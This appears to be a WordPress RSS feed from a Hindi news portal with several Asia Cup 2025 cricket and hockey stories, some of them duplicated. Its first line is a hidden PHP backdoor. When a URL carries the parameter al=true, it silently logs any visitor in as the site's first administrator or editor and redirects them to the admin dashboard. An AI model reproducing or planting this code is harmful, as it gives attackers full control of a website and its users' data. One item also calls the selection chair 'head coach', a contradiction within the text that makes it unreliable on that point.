// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Asia Cup – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Thu, 04 Sep 2025 13:08:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 एशिया कप 2025: यूएई ने टीम का ऐलान, दो नए खिलाड़ी शामिल https://pratyushaashakinayikiran.com/?p=182922 Thu, 04 Sep 2025 13:08:00 +0000 https://pratyushaashakinayikiran.com/?p=182922 अबू धाबी
संयुक्त अरब अमीरात ने गुरुवार को आगामी एशिया कप 2025 के लिए 17 सदस्यीय टीम की घोषणा की। एशिया कप में टीम की कमान मुहम्मद वसीम संभालेंगे। पाकिस्तान और अफगानिस्तान के साथ चल रही त्रिकोणीय सीरीज में मौजूद ज्यादा खिलाड़ियों को स्क्वॉड में जगह मिली है। नए खिलाड़ियों में दाएं हाथ के तेज गेंदबाज मतिउल्लाह खान और बाएं हाथ के स्पिनर सिमरनजीत सिंह को जोड़ा गया है।

एशिया कप 2025 की शुरुआत 9 सितंबर से अबू धाबी में होगी। यूएई की टीम ग्रुप ए में मौजूद है। भारत, ओमान और पाकिस्तान भी इस समूह में हैं। यूएई की टीम अपना मुकाबला भारत के खिलाफ खेलेगी। भारत और यूएई के बीच 10 सितंबर को दुबई इंटरनेशनल स्टेडियम में मुकाबला खेला जाएगा।

यूएई 15 सितंबर को अबू धाबी के जायेद क्रिकेट स्टेडियम में ओमान से खेलेगा। उनका आखिरी ग्रुप मैच 17 सितंबर को दुबई इंटरनेशनल स्टेडियम में पाकिस्तान के साथ होगा। ग्रुप चरण के बाद टूर्नामेंट सुपर 4 में प्रवेश करेगा, जहां प्रत्येक ग्रुप से शीर्ष दो टीमें क्वालीफाई करेंगी। सुपर 4 स्टेज 20 से 26 सितंबर तक चलेगा। दुबई में फाइनल खेला जाएगा, जो 28 सितंबर को होना है।

मतिउल्लाह ने एक वनडे और पांच टी20 अंतरराष्ट्रीय मैच खेले हैं और उनका आखिरी मैच जुलाई में नाइजीरिया के खिलाफ पर्ल ऑफ अफ्रीका सीरीज में था। सिमरनजीत ने पांच वनडे और 11 टी20 अंतरराष्ट्रीय मैचों में यूएई का प्रतिनिधित्व किया है और हाल ही में दिसंबर 2023 में गल्फ टी20 अंतरराष्ट्रीय चैंपियनशिप में खेले थे। 2016 के बाद से यह यूएई का पहला एशिया कप होगा।

एशिया कप 2025 के लिए यूएई टीम: मुहम्मद वसीम (कप्तान), अलीशान शराफू, अर्यांश शर्मा (विकेटकीपर), आसिफ खान, ध्रुव पाराशर, एथन डिसूजा, हैदर अली, हर्षित कौशिक, जुनैद सिद्दीकी, मतिउल्लाह खान, मुहम्मद फारूक, मुहम्मद जवादुल्लाह, मुहम्मद जोहैब, राहुल चोपड़ा (विकेटकीपर), रोहिद खान, सिमरनजीत सिंह और सगीर खान।

 

]]>
एशिया कप में बांग्लादेश की कहानी खत्म? क्रिकेट एक्सपर्ट ने किया बड़ा दावा https://pratyushaashakinayikiran.com/?p=182868 Thu, 04 Sep 2025 10:47:00 +0000 https://pratyushaashakinayikiran.com/?p=182868 नई दिल्ली 
पूर्व भारतीय क्रिकेटर और मौजूदा क्रिकेट एक्सपर्ट आकाश चोपड़ा ने दावा किया है कि टी20 एशिया कप 2025 में बांग्लादेश की टीम लीग फेज में ही बाहर हो सकती है। आकाश चोपड़ा ने पूरा विश्लेषण किया है और बताया है कि ग्रुप बी से कौन-कौन सी टीम सुपर 4 के लिए क्वॉलिफाई कर सकती है। ग्रुप बी में बांग्लादेश के अलावा अफगानिस्तान, श्रीलंका और हॉन्ग कॉन्ग की टीम है। एशिया कप 9 सितंबर से यूएई में खेला जाना है।

आकाश चोपड़ा ने अपने यूट्यूब वीडियो में बांग्लादेश को लेकर कहा, “बांग्लादेश की टीम वैसे तो बहुत अच्छा करती आ रही है, लेकिन अब वे ग्रुप ऑफ डेथ में हैं। इसमें श्रीलंका भी है, अफगानिस्तान भी वहीं पर है और हॉन्ग कॉन्ग चौथी टीम है। अफगानिस्तान ने तो अभी पाकिस्तान को हरा दिया है यूएई में। अब बांग्लादेश के लिए काम कठिन है। हालांकि, फास्ट बॉलिंग में दमखम है, लेकिन अब स्पिनर उनके पास नहीं हैं, जो एक समय पर बहुत हुआ करते थे।”

उन्होंने आगे कहा, "बड़ी सिंपल सी बात ये है कि उनके पास खोने के लिए कुछ नहीं है, जबकि पाने के लिए बहुत कुछ है, क्योंकि पिछले कई समय से अब ये मल्टीनेशन टूर्नामेंट में अच्छा नहीं कर रहे हैं। एक समय होता था ये अच्छा करते थे और दावेदार होते थे, लेकिन अब सिर्फ भागीदार होते हैं। थोड़े से अब आपके पास बड़े-बड़े नाम नहीं है तो उनकी अगर परछाई से निकल चुके हैं तो फिर आइए कुछ नई कहानी लिखिए।

आकाश चोपड़ा ने इसी वीडियो में आगे दावा किया, "मुझे तो लग रहा है कि ये फंस जाएंगे। अफगानिस्तान श्रीलंका असल में इस ग्रुप से क्वॉलिफाई करते नजर आ रहे हैं, जो ग्रुप ऑफ डेथ है। अफगानिस्तान अब एक अच्छी टीम टी20 क्रिकेट में है, जबकि श्रीलंका की टीम मल्टीनेशन टूर्नामेंट में पीछे नहीं हटती। वे पिछली बार फाइनल में पहुंचे थे और उसले टी20 एशिया कप का खिताब भी जीते थे। ऐसे में हो सकता है कि लीग स्टेज में ही बांग्लादेश की कहानी समाप्त हो जाए। इस बात की संभावना है।"

 

]]>
एशिया कप में बांग्लादेश की कहानी खत्म? क्रिकेट एक्सपर्ट ने किया बड़ा दावा https://pratyushaashakinayikiran.com/?p=182870 Thu, 04 Sep 2025 10:47:00 +0000 https://pratyushaashakinayikiran.com/?p=182870 नई दिल्ली 
पूर्व भारतीय क्रिकेटर और मौजूदा क्रिकेट एक्सपर्ट आकाश चोपड़ा ने दावा किया है कि टी20 एशिया कप 2025 में बांग्लादेश की टीम लीग फेज में ही बाहर हो सकती है। आकाश चोपड़ा ने पूरा विश्लेषण किया है और बताया है कि ग्रुप बी से कौन-कौन सी टीम सुपर 4 के लिए क्वॉलिफाई कर सकती है। ग्रुप बी में बांग्लादेश के अलावा अफगानिस्तान, श्रीलंका और हॉन्ग कॉन्ग की टीम है। एशिया कप 9 सितंबर से यूएई में खेला जाना है।

आकाश चोपड़ा ने अपने यूट्यूब वीडियो में बांग्लादेश को लेकर कहा, “बांग्लादेश की टीम वैसे तो बहुत अच्छा करती आ रही है, लेकिन अब वे ग्रुप ऑफ डेथ में हैं। इसमें श्रीलंका भी है, अफगानिस्तान भी वहीं पर है और हॉन्ग कॉन्ग चौथी टीम है। अफगानिस्तान ने तो अभी पाकिस्तान को हरा दिया है यूएई में। अब बांग्लादेश के लिए काम कठिन है। हालांकि, फास्ट बॉलिंग में दमखम है, लेकिन अब स्पिनर उनके पास नहीं हैं, जो एक समय पर बहुत हुआ करते थे।”

उन्होंने आगे कहा, "बड़ी सिंपल सी बात ये है कि उनके पास खोने के लिए कुछ नहीं है, जबकि पाने के लिए बहुत कुछ है, क्योंकि पिछले कई समय से अब ये मल्टीनेशन टूर्नामेंट में अच्छा नहीं कर रहे हैं। एक समय होता था ये अच्छा करते थे और दावेदार होते थे, लेकिन अब सिर्फ भागीदार होते हैं। थोड़े से अब आपके पास बड़े-बड़े नाम नहीं है तो उनकी अगर परछाई से निकल चुके हैं तो फिर आइए कुछ नई कहानी लिखिए।

आकाश चोपड़ा ने इसी वीडियो में आगे दावा किया, "मुझे तो लग रहा है कि ये फंस जाएंगे। अफगानिस्तान श्रीलंका असल में इस ग्रुप से क्वॉलिफाई करते नजर आ रहे हैं, जो ग्रुप ऑफ डेथ है। अफगानिस्तान अब एक अच्छी टीम टी20 क्रिकेट में है, जबकि श्रीलंका की टीम मल्टीनेशन टूर्नामेंट में पीछे नहीं हटती। वे पिछली बार फाइनल में पहुंचे थे और उसले टी20 एशिया कप का खिताब भी जीते थे। ऐसे में हो सकता है कि लीग स्टेज में ही बांग्लादेश की कहानी समाप्त हो जाए। इस बात की संभावना है।"

 

]]>
कप्तान हरमनप्रीत की हैट्रिक, भारत ने एशिया कप में चीन को हराया https://pratyushaashakinayikiran.com/?p=181632 Fri, 29 Aug 2025 13:30:00 +0000 https://pratyushaashakinayikiran.com/?p=181632 राजगीर 
कप्तान हरमनप्रीत सिंह की हैट्रिक के दम पर भारत ने एशिया कप पुरूष हॉकी टूर्नामेंट में अपने अभियान की शुरूआत शुक्रवार को पूल ए के मैच में चीन को 4-3 से हराकर की। हरमनप्रीत ने 20वें, 33वें और 47वें मिनट में पेनल्टी कॉर्नर पर गोल किए जबकि जुगराज सिंह ने 18वें मिनट में गोल दागा। 

चीन के लिए डु शिन्हाओ (12वां), चेन बेन्हाइ (35वां) और गाओ जीशेंग (42वां) ने गोल किए। पहले क्वार्टर में एक गोल से पिछड़ने के बाद भारत ने दूसरे क्वार्टर में दो मिनट में दो गोल करके हाफटाइम तक 2-1 की बढ़त बना ली। 

दूसरे हाफ के तीसरे ही मिनट में कप्तान हरमनप्रीत ने दूसरा गोल किया। चीन ने दो मिनट बाद ही जवाबी हमले में गोल दागा। आखिरी क्वार्टर में दोनों टीमें बराबरी पर थी लेकिन हरमनप्रीत ने 47वें मिनट में पेनल्टी कॉर्नर तब्दील करके भारत को जीत दिलाई।

]]>
कप्तान हरमनप्रीत की हैट्रिक, भारत ने एशिया कप में चीन को हराया https://pratyushaashakinayikiran.com/?p=181634 Fri, 29 Aug 2025 13:30:00 +0000 https://pratyushaashakinayikiran.com/?p=181634 राजगीर 
कप्तान हरमनप्रीत सिंह की हैट्रिक के दम पर भारत ने एशिया कप पुरूष हॉकी टूर्नामेंट में अपने अभियान की शुरूआत शुक्रवार को पूल ए के मैच में चीन को 4-3 से हराकर की। हरमनप्रीत ने 20वें, 33वें और 47वें मिनट में पेनल्टी कॉर्नर पर गोल किए जबकि जुगराज सिंह ने 18वें मिनट में गोल दागा। 

चीन के लिए डु शिन्हाओ (12वां), चेन बेन्हाइ (35वां) और गाओ जीशेंग (42वां) ने गोल किए। पहले क्वार्टर में एक गोल से पिछड़ने के बाद भारत ने दूसरे क्वार्टर में दो मिनट में दो गोल करके हाफटाइम तक 2-1 की बढ़त बना ली। 

दूसरे हाफ के तीसरे ही मिनट में कप्तान हरमनप्रीत ने दूसरा गोल किया। चीन ने दो मिनट बाद ही जवाबी हमले में गोल दागा। आखिरी क्वार्टर में दोनों टीमें बराबरी पर थी लेकिन हरमनप्रीत ने 47वें मिनट में पेनल्टी कॉर्नर तब्दील करके भारत को जीत दिलाई।

]]>
एशिया कप 2025: श्रीलंका ने घोषित की टीम, ‘बेबी मलिंगा’ भी शामिल https://pratyushaashakinayikiran.com/?p=181553 Fri, 29 Aug 2025 09:06:00 +0000 https://pratyushaashakinayikiran.com/?p=181553 कोलंबो 

एशिया कप 2025 के लिए श्रीलंका ने अपनी टीम का ऐलान कर दिया है. श्रीलंका क्रिकेट (SLC) ने इस टूर्नामेंट के लिए 16 सदस्यीय टीम की घोषणा की है, जिसकी कप्तानी चरिथ असलंका करेंगे. श्रीलंकाई टीम में ऑलराउंडर वानिंदु हसारंगा और तेज गेंदबाज मथीशा पथिराना जैसे स्टार खिलाड़ियों को भी जगह मिली है.

बता दें कि मथीशा पथिराना का एक्शन पूर्व श्रीलंकाई तेज गेंदबाज लसिथ मलिंगा की तरह है, जिसके चलते उन्हें 'बेबी मलिंगा' भी कहा जाता है. पथिराना ने दिसंबर 2024 में श्रीलंकाई के लिए आखिरी बार कोई मुकाबला खेला था. 22 साल के पथिराना इंडियन प्रीमियर लीग (IPL) में चेन्नई सुपर किंग्स (CSK) का प्रतिनिधित्व करते हैं.

एशिया कप 2025 के मुकाबले इस बार संयुक्त अरब अमीरात (UAE) के दो शहरों दुबई और अबू धाबी में खेले जाएंगे. टूर्नामेंट का आयोजन टी20 फॉर्मेट में होना है. ग्रुप-ए में भारत, पाकिस्तान, ओमान और यूएई को रखा गया है. जबकि ग्रुप-बी में हॉन्ग कॉन्ग, बांग्लादेश, श्रीलंका और अफगानिस्तान की टीमें हैं. एशिया कप 2025 की शुरुआत 9 सितंबर को होगी और इसका खिताबी मुकाबला 28 सितंबर को होना है.

श्रीलंका के ग्रुप मुकाबले कब-कब?
श्रीलंका ने एशिया कप के पिछले संस्करण (2023) में दूसरा स्थान हासिल किया था. श्रीलंका अपने अभियान की शुरुआत 13 सितंबर को अबू धाबी में बांग्लादेश के खिलाफ मुकाबले से करेगा. फिर उसका सामना 15 सितंबर को दुबई में हॉन्ग कॉन्ग से होगा. इसके बाद श्रीलंकाई टीम 18 सितंबर को अबू धाबी में अफगानिस्तान के खिलाफ ग्रुप स्टेज का अपना आखिरी मुकाबला खेलेगी.

एशिया कप के लिए श्रीलंका का 16 सदस्यीय स्क्वॉड: चरिथ असलंका (कप्तान), पथुम निसंका, कुसल मेंडिस, कुसल परेरा, नुवानीदु फर्नांडो, कामिंदु मेंडिस, कामिल मिशारा, दासुन शनाका, वानिंदु हसारंगा, डुनिथ वेलालगे, चमिका करुणारत्ने, महीश तीक्ष्णा, दुष्मंथा चमीरा, बिनुरा फर्नांडो, नुवान तुषारा, मथीशा पथिराना.

]]>
एशिया कप टीम चयन के बाद अजीत अगरकर के कॉन्ट्रैक्ट में बड़ा बदलाव, चयन समिति में खलबली! https://pratyushaashakinayikiran.com/?p=179610 Thu, 21 Aug 2025 11:45:00 +0000 https://pratyushaashakinayikiran.com/?p=179610 नई दिल्ली 
भारतीय क्रिकेट कंट्रोल बोर्ड यनी बीसीसीआई ने टीम इंडिया के हेड कोच अजीत अगरकर के कॉन्ट्रैक्ट में बदलाव किया है। यह बदलाव एशिया कप 2025 के स्क्वॉड के ऐलान के कुछ दिन बाद ही हुआ। बीसीसीआईॉ ने चयन समिति के अध्यक्ष अजीत अगरकर का कॉन्ट्रैक्ट जून 2026 तक बढ़ा दिया है। जून 2023 में शुरू हुए उनके कार्यकाल में, भारत ने 2024 में टी20 वर्ल्ड कप और इस साल की शुरुआत में चैंपियंस ट्रॉफी जीतकर आईसीसी ट्रॉफी का सूखा खत्म किया था। उनके रहते हैं भारतीय टेस्ट टीम में प्रभावशाली बदलाव देखने को मिले साथ ही टीम 2023 वर्ल्ड कप के फाइनल में पहुंची थी। इन सभी उपलब्धियों को देखते हुए अगरकर का कॉन्ट्रैक्ट बढ़ाया गया है।
 
मीडिया रिपोर्ट के अनुसार आईपीएल 2025 से पहले ही अजीत अगरकर के कॉन्ट्रैक्ट को बढ़ाने की बात हो गई थी, जिसे हेड कोच ने एक्सेप्ट कर लिया है। बीसीसीआई के एक अधिकारी ने बताया, "उनके (अजीत अगरकर) कार्यकाल में भारतीय टीम ने खिताब जीते और टेस्ट और टी20 में भी बदलाव देखा। बीसीसीआई ने उनका अनुबंध जून 2026 तक बढ़ा दिया था और उन्होंने कुछ महीने पहले ही यह प्रस्ताव स्वीकार कर लिया था।" अजीत अगरकर के रहते ही विराट कोहली और रोहित शर्मा ने टी20 और टेस्ट से रिटायरमेंट लिया और इन दोनों फॉर्मेट में भारत को नया कप्तान मिला। टेस्ट में शुभमन गिल को तो टी20 में सूर्यकुमार यादव को यह जिम्मेदारी सौंपी गई है। रोहित-विराट वनडे में एक्टिव है, मगर आगामी समय में यहां भी बड़े बदलाव देखने को मिल सकते हैं।

एस शरत को हटाया जा सकता है
मौजूदा समय में चयन समिति में अगरकर के अलावा एसएस दास, सुब्रतो बनर्जी, अजय रात्रा और एस शरत शामिल हैं। लेकिन ऐसा माना जा रहा है कि सितंबर में होने वाली वार्षिक आम सभा की बैठक के बाद सीनियर चयन समिति में कुछ बदलाव देखने को मिलेंगे। शरत, जो सितंबर 2021 में जूनियर चयन समिति के अध्यक्ष थे और जनवरी 2023 में सीनियर चयन समिति में प्रमोट कर दिया गया था। उन्हें अब चार साल पूरे होने को है।

पता चला है कि बोर्ड उनकी जगह किसी नए चेहरे को नियुक्त कर सकता है। बीसीसीआई आगे चलकर नए सिरे से आवेदन आमंत्रित करेगा। हालांकि, यह स्पष्ट नहीं है कि बोर्ड दास और बनर्जी को बरकरार रखेगा या नहीं। बोर्ड कथित तौर पर मौजूदा चयन समिति से संतुष्ट है और पैनल में केवल एक संभावित बदलाव किया जा सकता है।

]]>
एशिया कप में टीम इंडिया की ओपनिंग किसके हाथ? जानिए 5 दावेदारों की रेस https://pratyushaashakinayikiran.com/?p=177085 Mon, 11 Aug 2025 06:55:00 +0000 https://pratyushaashakinayikiran.com/?p=177085 दुबई 

एशिया कप क्रिकेट टूर्नामेंट 9  से 28 सितंबर तक संयुक्त अरब अमीरात (UAE) के दो शहरों अबूधाबी और दुबई में खेला जाएगा. चूंकि एशिया कप 2025 टी20 फॉर्मेट में होगा, ऐसे में रोहित शर्मा और विराट कोहली इस टूर्नामेंट का पार्ट नहीं होंगे. कोहली और रोहित ने 2024 में वर्ल्ड कप जीत के बाद टी20 इंटरनेशनल से संन्यास ले लिया था.

एशिया कप के लिए भारतीय टीम का ऐलान अब तक नहीं हुआ है. टीम की घोषणा अगस्त के तीसरे हफ्ते में हो सकती है. इस बार भारतीय चयनकर्ताओं को टीम चुनने के लिए काफी माथापच्ची करनी पड़ेगी. सेलेक्टर्स को सबसे ज्यादा मशक्कत ओपनिंग कॉम्बिनेशन को लेकर करनी होगी. ये देखना होगा कि एशिया कप में ओपनिंग स्लॉट के लिए किन-किन खिलाड़ियों के नाम फाइनल होते हैं. वैसे पांच खिलाड़ी ओपनिंग स्लॉट के लिए रेस में बताए जा रहे हैं, जिनमें से दो के नाम फाइनल हो सकते हैं. जबकि एक को रिजर्व ओपनर के तौर पर स्क्वॉड में चुना जा सकता है.

अभिषेक शर्मा: इस युवा बल्लेबाज ने टी20 क्रिकेट में बहुत कम समय में अपनी छाप छोड़ी है. अभिषेक आईसीसी की टी20 बल्लेबाजी रैंकिंग में टॉप पर मौजूद हैं. अभिषेक अपनी विस्फोटक बल्लेबाजी के लिए जाने जाते हैं, साथ ही वो गेंद से भी उपयोगी साबित हो सकते हैं. अभिषेक का सेलेक्शन पक्का दिख रहा है. अभिषेक ने भारत के लिए 17 टी20 इंटरनेशनल मैचों में 535 रन बनाए, जिसमें दो शतक और दो अर्धशतक शामिल रहे.

यशस्वी जायसवाल: बाएं हाथ के इस बल्लेबाज ने इंग्लैंड दौरे पर टेस्ट क्रिकेट में शानदार प्रदर्शन करते हुए दो शतक जड़े थे. साथ ही इंडियन प्रीमियर लीग (IPL) 2025 में राजस्थान रॉयल्स (RR) के लिए बेहतरीन फॉर्म में रहे थे. अभिषेक शर्मा की तरह यशस्वी भी तूफानी बल्लेबाजी के लिए जाने जाते हैं. यशस्वी ने अपना आखिरी टी20 इंटरनेशनल मुकाबला जुलाई 2024 में खेला था, लेकिन इस बड़े टूर्नामेंट के लिए उनकी टीम में वापसी हो सकती है. यशस्वी ने भारत के लिए 23 टी20 मैचों में 723 रन बनाए, जिसमें 1 शतक और पांच अर्धशतक शामिल रहे.

संजू सैमसन: टी20 इंटरनेशनल में बतौर ओपनर संजू सैमसन तीन शतक जड़ चुके हैं. आक्रामक बल्लेबाजी और विकेटकीपिंग दोनों में वो भारत के लिए अच्छे विकल्प हो सकते हैं.  हालांकि संजू के फॉर्म में उतनी निरंतरता देखने को नहीं मिली है, जो उनके खिलाफ जाती है. वैसे अच्छी बात ये है कि संजू सैमसन एक विकेटकीपर हैं, जिससे उनका सेलेक्शन का दावा मजबूत होता है. संजू ने अब तक भारत के लिए 42 टी20 इंटरनेशनल मैचों में 861 रन बनाए हैं.

शुभमन गिल: इंग्लैंड के खिलाफ टेस्ट सीरीज में शुभन गिल ने जैसा प्रदर्शन किया था, ऐसे में उन्हें एशिया कप के लिए इग्नोर करना मुश्किल होगा. शुभमन आखिरी बार भारत के लिए जुलाई 2024 में टी20 क्रिकेट खेलते नजर आए थे. अब उनकी वापसी हो जाए तो किसी को हैरानी नहीं होनी चाहिए. शुभमन व्हाइट बॉल क्रिकेट में ओपनिंग करते आए हैं, ऐसे में उन्हें बतौर ओपनर एशिया कप के लिए टीम में जगह मिल सकती है. शुभमन ने 21 टी20 इंटरनेशनल मैचों में 578 रन बनाए हैं, जिसमें 1 शतक और 3 अर्धशतक शामिल रहे.

साई सुदर्शन: बाएं हाथ के बल्लेबाज साई सुदर्शन भी एक तगड़े दावेदार हैं. सुदर्शन ने इंडियन प्रीमियर लीग (IPL) 2025 में सबसे ज्यादा 759 रन बनाए थे, जो क्रिकेट के सबसे छोटे फॉर्मेट में उनकी निरंतरता को बयां करता है. हालांकि सुदर्शन को भारत के लिए अब तक सिर्फ एक टी20 मुकाबले में भाग लेने का मौका मिला है, जो पिछले साल जुलाई में जिम्बाब्वे के विरुद्ध था. उस मुकाबले में हालांकि सुदर्शन की बैटिंग नहीं आई थी.

बता दें कि एशिया कप 2025 में कुल 8 टीमें भाग लेने वाली हैं, जिन्हें दो ग्रुप में बांटा गया है. ग्रुप-ए में भारत को पाकिस्तान, यूएई और ओमान के साथ रख गया है. जबकि ग्रुप बी में श्रीलंका, हॉन्ग कॉन्ग, बांग्लादेश और अफगानिस्तान हैं. दोनों ग्रुप से शीर्ष दो-दो टीमें सुपर 4 चरण में पहुंचेंगी. फिर सुपर 4 स्टेज में टॉप पर रहने वाली दो टीमों के बीच 28 सितंबर को खिताबी मुकाबला होगा.

]]>
एशिया कप अगर स्थगित हुआ तो…पाकिस्तान बना रहा अफगानिस्तान को लेकर अलग ही प्लान https://pratyushaashakinayikiran.com/?p=163494 Fri, 13 Jun 2025 10:46:00 +0000 https://pratyushaashakinayikiran.com/?p=163494 कराची
 पाकिस्तान क्रिकेट बोर्ड (पीसीबी) एशिया कप के रद्द या स्थगित होने की स्थिति में यूएई और अफगानिस्तान के साथ अगस्त में त्रिकोणीय श्रृंखला आयोजित करने के लिए बातचीत कर रहा है। एशिया कप को सितंबर में खेला जाना है और इसकी मेजबानी का अधिकार भारत के पास है। इस साल की शुरुआत में चैंपियंस ट्रॉफी से पहले स्वीकार किए गए हाइब्रिड मॉडल के अनुसार पाकिस्तान इस टूर्नामेंट के लिए भारत की यात्रा नहीं करेगा।
त्रिकोणीय सीरीज की शुरू की तैयारी

एशिया कप के आयोजन को लेकर अस्पष्टता के बीच पीसीबी ने अफगानिस्तान बोर्ड के साथ बातचीत शुरू कर दी है। अफगानिस्तान को सीमित ओवरों की श्रृंखला के लिए अगस्त में पाकिस्तान का दौरा करना है। पीसीबी के एक सूत्र ने कहा,'पाकिस्तान और भारत के बीच खराब होते संबंधों के कारण अब एशिया कप की भारत में सितंबर में होने की संभावना नहीं है, इसलिए पीसीबी एक और त्रिकोणीय श्रृंखला के प्रस्ताव पर काम कर रहा है। एशिया कप का आयोजन अगर यूएई में होता है तो पाकिस्तान अगस्त में अफगानिस्तान और यूएई के साथ दुबई में त्रिकोणीय श्रृंखला खेलेगा। यह अफगानिस्तान के पाकिस्तान दौरे की जगह लेगा।'
पीसीबी ने तैयार किया प्लान बी

उन्होंने कहा कि पीसीबी त्रिकोणीय श्रृंखला के आयोजन के लिए दोनों क्रिकेट बोर्ड के साथ पहले से ही बातचीत कर रहा है। सूत्र ने खुलासा किया,'अगर एशिया कप रद्द या स्थगित होता है तो पीसीबी चाहता है कि अफगानिस्तान और यूएई की टीमें अगस्त में पाकिस्तान में त्रिकोणीय श्रृंखला खेलें।'
बीसीसीआई ने अबतक नहीं जताई है एशिया कप के आयोजन की इच्छा

पीसीबी अध्यक्ष मोहसिन नकवी एशियाई क्रिकेट परिषद (एसीसी) के मौजूदा अध्यक्ष हैं। एसीसी एशिया कप पर निर्णय लेने के लिए जल्द ही बैठक करेगी। उन्होंने कहा,'भारतीय क्रिकेट बोर्ड ने अभी तक घरेलू मैदान पर एशिया कप की मेजबानी करने की अपनी इच्छा की पुष्टि नहीं की है। ऐसे में यह देखना होगा कि एसीसी टी20 प्रारूप में प्रस्तावित इस एशिया कप के भविष्य पर कब तक फैसला लेती है।'

]]>
एशिया कप भारतीय क्रिकेट टीम के लिए एक बड़ा बदलाव लेकर आ रहा, नहीं खेलेंगे कोहली-रोहित https://pratyushaashakinayikiran.com/?p=140528 Sun, 16 Mar 2025 12:55:00 +0000 https://pratyushaashakinayikiran.com/?p=140528 नई दिल्ली
साल 2025 में होने वाला एशिया कप भारतीय क्रिकेट टीम के लिए एक बड़ा बदलाव लेकर आ रहा है। विराट कोहली और रोहित शर्मा जैसे सितारे इस बार टीम का हिस्सा नहीं होंगे। ये दोनों खिलाड़ी और साथ ही रविंद्र जडेजा ने क्रिकेट के सबसे छोटे फॉर्मेट (टी-20) को अलविदा कह दिया है, जिससे टीम इंडिया को एक नई दिशा में कदम बढ़ाने की चुनौती का सामना करना पड़ेगा। इस बार एशिया कप की मेज़बानी भारत के पास है, लेकिन खबरों के मुताबिक टूर्नामेंट को किसी न्यूट्रल वेन्यू पर कराने की तैयारी की जा रही है। यह फैसला इसलिए लिया जा रहा है क्योंकि भारतीय टीम में बदलावों के बावजूद इस टूर्नामेंट का आयोजन ठीक से और निष्पक्ष रूप से किया जा सके।

टीम की जिम्मेदारी किसपर?
कोहली और रोहित के बिना टीम इंडिया की कप्तानी का जिम्मा सूर्यकुमार यादव या हार्दिक पांड्या पर होगा। दोनों ही खिलाड़ी इस वक्त शानदार फॉर्म में हैं और टीम को मजबूती देने के लिए पूरी तरह तैयार हैं। सूर्यकुमार यादव, जिन्होंने पिछले कुछ समय में अपने खेल से सबका दिल जीता है, अब कप्तान के रूप में टीम का नेतृत्व करेंगे। वहीं, हार्दिक पांड्या, जो एक ऑलराउंडर के रूप में अपनी भूमिका निभा रहे हैं, उनसे भी बड़े प्रदर्शन की उम्मीद होगी।

युवा खिलाड़ियों को मिलेगा मौका
इस एशिया कप में युवाओं को भी मौका मिलेगा। टीम इंडिया के युवा खिलाड़ी जैसे यशस्वी जायसवाल और शुभमन गिल पर बहुत कुछ निर्भर करेगा। दोनों खिलाड़ी पिछले कुछ समय में शानदार प्रदर्शन कर चुके हैं और अब एशिया कप में अपनी टीम के लिए बड़ी भूमिका निभा सकते हैं। उनकी बेहतरीन बल्लेबाजी से टीम को मजबूत बनाने की उम्मीद की जा रही है।

गेंदबाजी की अगुवाई करेंगे जसप्रीत बुमराह
गेंदबाजी में भारतीय टीम का मुख्य आधार जसप्रीत बुमराह होंगे। बुमराह, जो दुनिया के सबसे बेहतरीन पेस बॉलर्स में से एक माने जाते हैं, इस बार एशिया कप में अपनी टीम के लिए कड़ी चुनौती से मुकाबला करने के लिए तैयार हैं। उनके नेतृत्व में पेस अटैक को मजबूती मिलेगी और टीम को विपक्षी टीमों के खिलाफ एक महत्वपूर्ण फायदा मिलेगा।

भारत-पाकिस्तान की भिड़ंत
एशिया कप में भारत और पाकिस्तान के बीच मुकाबला हमेशा ही आकर्षण का केंद्र रहता है। इस बार भी दोनों टीमों के बीच तीन बार भिड़ंत हो सकती है। पहले ग्रुप स्टेज में दोनों टीमें एक-दूसरे के खिलाफ खेल सकती हैं, फिर सुपर फोर में भी इन दोनों के बीच मैच हो सकता है। अगर सब कुछ सही रहा तो एशिया कप का फाइनल भी भारत-पाकिस्तान के बीच हो सकता है, जो क्रिकेट प्रेमियों के लिए एक रोमांचक मुकाबला होगा।

 

]]>